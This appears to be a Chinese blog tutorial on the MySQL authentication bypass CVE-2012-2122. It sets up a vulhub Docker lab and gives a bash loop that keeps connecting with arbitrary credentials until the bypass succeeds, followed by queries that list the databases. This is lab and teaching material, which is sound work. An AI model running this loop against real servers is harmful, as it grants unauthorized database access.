热门标签
热门文章
- 1大数据技术之Hive(一)_大数据hive技术
- 2软件工程导论_软件工程导论目录
- 3android studio自定义文件头的两种方式_android studio file head
- 4PyTorch实战6:好莱坞明星识别--VGG16_pytorch vgg16 参数设置
- 5Mysql中concat()和concat_ws() 的用法
- 6前端面试题之浏览器_前端面试浏览器
- 7Python应用开发——30天学习Streamlit Python包进行APP的构建(1)_python 安装streamlit
- 8基于OMAPL138的Linux字符驱动_GPIO驱动AD9833(一)之miscdevice和ioctl_omapl138 vpif linux驱动程序
- 9mysql分组时取日期最新的一条数据_一批数据分组打标识只保留日期最新的数据
- 10接口测试面试题汇总(含答案)
当前位置: article > 正文
数据库安全:MySQL 身份认证漏洞(CVE-2012-2122)
作者:小惠珠哦 | 2024-08-16 08:05:14
赞
踩
cve-2012-2122
数据库安全:MySQL 身份认证漏洞(CVE-2012-2122)
MySQL 身份认证漏洞是一个身份认证绕过漏洞,该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,这个漏洞可以使攻击者可以绕过安全身份认证,从而达到未经授权的方式进行访问 MySQL 数据库。
目录:
数据库安全:MySQL 身份认证漏洞(CVE-2012-2122)
漏洞测试的思路方向(3306端口):
漏洞的危害:
攻击者只需要知道用户名,就可以不断去尝试密码就能直接进入SQL数据库.
漏洞影响的版本:
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
-
- MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
MySQL 身份认证漏洞(CVE-2012-2122)
开启 vulhub 靶场环境
第一步:切换到 vulhub 目录下
cd vulhub
第二步:切换到 mysql 目录下
cd mysql
第三步:切换到 CVE-2012-2122 漏洞目录下.
cd CVE-2012-2122
第四步:开启 漏洞 服务.
docker-compose up -d 
MySQL 身份认证漏洞测试:
方法:直接 运行 这个命令.
- for i in `seq 1 1000`;do mysql -uroot -p123456 -h 192.168.0.104 -P3306;done
-
- for i in `seq 1 1000`;do mysql -u(账号不用正确) -p(密码不用正确) -h(MySQLIP地址) -P3306;done
-
- //这个命令的意思就是:for语句调用终端去连接MySQL,如果存在这个漏洞,他就会不断的去尝试进入 MySQL 数据库中
show databases; //显示数据库列表
select version(); //显示数据库版本.
课程学习:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili
推荐阅读
相关标签
